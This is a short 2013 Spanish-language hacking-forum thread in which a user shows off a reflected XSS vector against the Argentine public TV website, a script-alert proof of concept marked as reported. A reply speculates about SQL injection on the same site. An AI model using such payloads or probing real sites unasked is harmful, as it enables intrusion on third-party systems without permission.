Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: trackerkey en Enero 30, 2013, 03:30:58 pm

Título: XSS Tv Publica argentina
Publicado por: trackerkey en Enero 30, 2013, 03:30:58 pm
(http://i.imgur.com/GiLAZeR.png?1)

Web: www.tvpublica.com.ar/
Vector: "><script>alert(/trackerkey - Underc0de/)</script>
Autor: Trackerkey
Reportado: SI
Título: Re:XSS Tv Publica argentina
Publicado por: Tulkalex en Enero 30, 2013, 03:44:18 pm
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!
Título: Re:XSS Tv Publica argentina
Publicado por: trackerkey en Enero 31, 2013, 01:32:39 am
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!

Probe si era vulnerable sqli pero al parecer no,porlomenos yo no pude

Saludos